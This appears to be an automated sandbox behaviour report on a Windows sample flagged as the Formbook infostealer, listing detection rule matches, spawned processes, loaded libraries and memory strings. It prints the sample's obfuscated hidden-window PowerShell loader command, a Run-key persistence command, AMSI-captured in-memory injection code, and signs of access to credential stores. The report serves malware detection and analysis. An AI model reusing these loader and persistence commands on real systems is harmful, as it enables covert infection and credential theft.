Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@17/13@4/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Code function: 0_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404766
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Code function: 0_2_00402173 CoCreateInstance,MultiByteToWideChar, 0_2_00402173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Mutant created: NULL
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  File created: C:\Users\user\AppData\Local\Temp\nsnA2B.tmp
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cmd.exe, 0000000E.00000002.2614682827.0000000000962000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2350094315.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2349933593.0000000000937000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000985000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Virustotal: Detection: 57%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: unknown  Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: psiloses.lnk.0.drLNK file: ..\..\Users\user\Music\forbindingers.Bam132
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

Source: Yara match | File source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbede $Fremstillede $Halsens), (Bypast @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Presidia152 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Co
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klovnenumrene)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Vilnis, $false).DefineType($Offentliggrelse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0796CE08 pushfd ; iretd 2_2_0796CFA5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093B9BDA push edi; retf 2_2_093B9BDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093B62BD push ecx; retf 2_2_093B62C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093B3EA3 push eax; ret 2_2_093B3EA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093B7C81 push ebp; ret 2_2_093B7C9F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093BA6E7 pushfd ; iretd 2_2_093BA6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2043225F pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204327FA pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2043283D push eax; iretd 8_2_20432858
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204609AD push ecx; mov dword ptr [esp], ecx 8_2_204609B6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_016662BD push ecx; retf 8_2_016662C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_0166A6E7 pushfd ; iretd 8_2_0166A6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_01669BDA push edi; retf 8_2_01669BDB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_01667C81 push ebp; ret 8_2_01667C9F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_01663EA3 push eax; ret 8_2_01663EA4
